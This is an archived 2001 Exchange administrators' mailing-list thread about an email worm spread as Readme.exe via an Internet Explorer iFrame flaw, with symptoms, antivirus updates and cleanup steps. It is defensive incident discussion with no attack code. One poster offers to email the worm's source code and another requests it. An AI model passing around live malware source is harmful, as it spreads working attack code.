a Microsoft Web Folder Transversal vulnerability. The email attachment name seems to be limited to Readme.exe and uses the icon for an Internet Explorer HTML document. The virus contains the string : Concept Virus (CV) V.5, Copyright (C) 2001 R.P.China http:[EMAIL PROTECTED] Until they come up with a patch, block all file attachments named readme.exe. I'm sure we'll be seeing a lot more of this in the coming days. Steve -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
It exploits the very dangerous iFrame vulnerability detailed at http://www.microsoft.com/technet/security/bulletin/ms01-020.asp. The one thing that article doesn't tell you is that the IE patch it describes does not block the ability of Office documents in an iFrame to launch automatically. What that means is that if you don't have Office macro security set high enough, the next attack could use a Word .doc macro to deliver its payload. I just received an e-mail with this virus/worm. It appears to be not very nice. I use the preview pane in Outlook and it automatically attempted to launch the attachment. For once, I'm glad I had the new security features in Outlook SR-1 that does not allow launching an .exe w/out saving it to the hard drive first. The virus had a subject with 255 characters in it. Methinks there was/is an exploit for subject lines that long. _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
the sdat version 2 deleted a bunch of executables on the three nt boxes we ran virus scan on. we had it set to automatically clean. iexplore.exe hyperterminal, etc. not good. anyone else seeing this? -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
woops, i should say that i'm talking about NAI's sdat. -Original Message- From: Heather Bellson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? the sdat version 2 deleted a bunch of executables on the three nt boxes we ran virus scan on. we had it set to automatically clean. iexplore.exe hyperterminal, etc. not good. anyone else seeing this? -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Trend finally came out with there pattern update. :( Luckly I didn't get it anywhere. -Original Message- From: Heather Bellson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 4:23 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? woops, i should say that i'm talking about NAI's sdat. -Original Message- From: Heather Bellson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? the sdat version 2 deleted a bunch of executables on the three nt boxes we ran virus scan on. we had it set to automatically clean. iexplore.exe hyperterminal, etc. not good. anyone else seeing this? -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
search the registry for root.exe, I didn't think I had it either but... -Original Message- From: Craig Manske [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:24 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Trend finally came out with there pattern update. :( Luckly I didn't get it anywhere. -Original Message- From: Heather Bellson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 4:23 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? woops, i should say that i'm talking about NAI's sdat. -Original Message- From: Heather Bellson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? the sdat version 2 deleted a bunch of executables on the three nt boxes we ran virus scan on. we had it set to automatically clean. iexplore.exe hyperterminal, etc. not good. anyone else seeing this? -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Symantec released the new virus defs (9/18/01) that are supposed to catch this. Chuck Parkey -Original Message- From: Craig Manske [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:24 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Trend finally came out with there pattern update. :( Luckly I didn't get it anywhere. -Original Message- From: Heather Bellson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 4:23 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? woops, i should say that i'm talking about NAI's sdat. -Original Message- From: Heather Bellson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? the sdat version 2 deleted a bunch of executables on the three nt boxes we ran virus scan on. we had it set to automatically clean. iexplore.exe hyperterminal, etc. not good. anyone else seeing this? -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
I searched the registry on the exchange box earlier and found the readme.eml and root.exe under HK_users, Doc Find Spec MRU. I cannot find the file anywhere on the machine and everything appears to be working fine. I did not have the ScanMail patch until about an hour or so ago. I am blocking exe's now but I wasn't earlier today. Should I just delete these values in the registry? TIA Gordon -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 1:57 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? It exploits the very dangerous iFrame vulnerability detailed at http://www.microsoft.com/technet/security/bulletin/ms01-020.asp. The one thing that article doesn't tell you is that the IE patch it describes does not block the ability of Office documents in an iFrame to launch automatically. What that means is that if you don't have Office macro security set high enough, the next attack could use a Word .doc macro to deliver its payload. I just received an e-mail with this virus/worm. It appears to be not very nice. I use the preview pane in Outlook and it automatically attempted to launch the attachment. For once, I'm glad I had the new security features in Outlook SR-1 that does not allow launching an .exe w/out saving it to the hard drive first. The virus had a subject with 255 characters in it. Methinks there was/is an exploit for subject lines that long. _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Oh god, no -Original Message- From: Andrew Pike [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 1:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? May I have a copy please!! -Original Message- From: Daniel Deward [mailto:[EMAIL PROTECTED]] Sent: 18 September 2001 21:08 To: Exchange Discussions Subject: RE: New Virus / Worm ?? If you want the source code for readme.exe, readme.asm. Send me an e-mail for a copy. It's very interesting! Dan http://www.cmsconnect.com -Original Message- From: Erik Sojka [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 4:02 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? What share does it create on an infected machine? _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] This email has been scanned for all viruses by the Star Internet Virus Screen. The service is provided in partnership with MessageLabs, the email security company. For more information on a higher level of virus protection visit www.star.net.uk This email has been scanned for all viruses by the Star Internet Virus Screen. The service is provided in partnership with MessageLabs, the email security company. For more information on a higher level of virus protection visit www.star.net.uk _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Exactly where in the registry did you find it? -Original Message- From: Gordon Olson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 4:46 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? search the registry for root.exe, I didn't think I had it either but... -Original Message- From: Craig Manske [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:24 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Trend finally came out with there pattern update. :( Luckly I didn't get it anywhere. -Original Message- From: Heather Bellson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 4:23 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? woops, i should say that i'm talking about NAI's sdat. -Original Message- From: Heather Bellson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? the sdat version 2 deleted a bunch of executables on the three nt boxes we ran virus scan on. we had it set to automatically clean. iexplore.exe hyperterminal, etc. not good. anyone else seeing this? -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
